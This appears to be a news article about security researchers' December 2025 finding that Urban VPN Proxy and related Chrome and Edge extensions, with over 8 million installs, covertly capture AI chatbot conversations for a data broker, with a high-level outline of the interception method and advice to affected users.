Browser Extensions with 8 Million Users Collect Extended AI Conversations: A Major Privacy Scandal Unveiled
In a startling revelation that has sent shockwaves through the tech community, security researchers have exposed a widespread privacy breach involving popular browser extensions. On December 16-17, 2025, Koi Security published findings showing that extensions with over 8 million combined installs across Chrome and Edge have been secretly harvesting complete conversations from leading AI chatbots. These “privacy-focused” tools—primarily from publisher Urban Cyber Security Inc.—intercept prompts and responses from platforms like ChatGPT, Claude, Gemini, Microsoft Copilot, Perplexity, DeepSeek, Grok, and Meta AI, then transmit the data to servers linked to data broker BiScience for marketing purposes.
The flagship culprit, Urban VPN Proxy, boasts more than 6 million Chrome users and a coveted “Featured” badge from Google, implying rigorous vetting for quality and privacy. Yet, since a silent update in July 2025 (version 5.5.0), it and seven sibling extensions have been capturing sensitive AI interactions independently of their core functions (VPN, ad blocking, etc.). This betrayal of trust affects millions who installed these tools seeking protection, only to have their most intimate digital dialogues—often containing health, financial, or personal details—commoditized.
This scandal highlights the vulnerabilities in browser extension ecosystems, where privileged access meets lax oversight. As AI chats become repositories for users’ deepest thoughts, this incident underscores a critical erosion of privacy in the age of generative AI.
The Discovery: How Koi Security Uncovered the Breach
Koi Security’s investigation began innocently enough: using their Wings agentic-AI risk engine to scan for extensions capable of exfiltrating AI chat data. To their surprise, high on the list was Urban VPN Proxy—a highly rated, Featured extension promising secure browsing and “AI protection.”
Deeper analysis revealed sophisticated malware-like behavior. When users visit targeted AI sites, the extension injects platform-specific “executor” scripts (e.g., chatgpt.js, claude.js, gemini.js). These override core browser APIs like fetch() and XMLHttpRequest, intercepting raw network traffic before it renders on-screen.
Captured data includes:
- Full user prompts and AI responses
- Conversation IDs and timestamps
- Session metadata
- Platform and model details
This packaged information routes to Urban VPN servers (e.g., analytics.urban-vpn.com), then allegedly to BiScience for aggregation and sale.
Koi expanded the probe, finding identical code in seven more extensions: 1ClickVPN Proxy, Urban Browser Guard, Urban Ad Blocker, and variants on Edge. Total reach: over 8 million installs.
Technical Breakdown: A Masterclass in Stealthy Data Exfiltration
The mechanism is insidious in its elegance. Extensions enjoy broad permissions (“read and change all your data on websites you visit”), enabling content script injection.
Process:
- Tab monitoring detects AI platform visits.
- Injection of executor scripts.
- API overriding captures raw requests/responses.
- Parsing and packaging via postMessage.
- Transmission from background worker—independent of VPN/ad-block toggles.
Hardcoded flags ensure harvesting runs by default, with no opt-out beyond uninstallation.
The “AI protection” feature—warning about sensitive data sharing—operates separately, creating ironic deception: it alerts users not to share emails with ChatGPT while sending everything to third parties.
Introduced via auto-update in July 2025, pre-existing users never consented anew.
Browser Security Threats: Common Risks Enterprises Face
The Publisher and Data Broker Connection
Urban Cyber Security Inc. develops these extensions, affiliated with BiScience—a known player in clickstream data sales via products like AdClarity.
Privacy policies (updated June 2025) admit collecting “AI prompts and outputs” for “marketing analytics,” claiming anonymization. Yet Chrome Web Store listings assert no third-party sales, and disclosures are buried in legalese.
Prior reports flagged BiScience for browsing history harvesting; this escalates to far more sensitive AI dialogues.
Scale and Sensitivity: Why This Matters
Over 8 million installs translate to potentially hundreds of millions of captured conversations since July. AI chats often delve into vulnerable topics: therapy sessions, medical advice, financial planning, relationship issues.
This data goldmine enables targeted advertising, profiling, or worse—re-identification via persistent identifiers.
Ironically, users sought privacy tools, amplifying the betrayal.
Platform Oversight Failures
Google’s “Featured” badge and manual reviews failed to detect months of activity. Auto-updates bypass re-review, exploiting trust.
Microsoft Edge mirrors the issue. Calls mount for stricter behavioral auditing and prominent consent for sensitive collection.
User Impact and Immediate Risks
Affected users should:
- Uninstall all Urban extensions immediately.
- Assume post-July AI chats compromised.
- Rotate passwords/secrets mentioned in chats.
- Monitor for phishing leveraging leaked details.
Enterprises: Audit extensions, enforce allowlists.
Broader Implications for AI Privacy
This exposes AI’s privacy paradox: users confide in chatbots assuming seclusion, yet intermediaries lurk.
It fuels debates on extension permissions, store accountability, and data brokerage regulation.
As AI integrates deeper, such breaches erode trust.
Conclusion: Safeguarding Your Digital Confidences
The exposure of browser extensions harvesting AI conversations from 8 million users marks a watershed privacy scandal. What began as tools for protection morphed into surveillance engines, commoditizing intimate dialogues for profit.
Vigilance is paramount: scrutinize extensions, favor minimal permissions, demand transparency from platforms.
In an era where AI companions hold our secrets, this incident reminds us—privacy isn’t guaranteed; it must be fiercely guarded. Review your extensions today; your conversations depend on it.
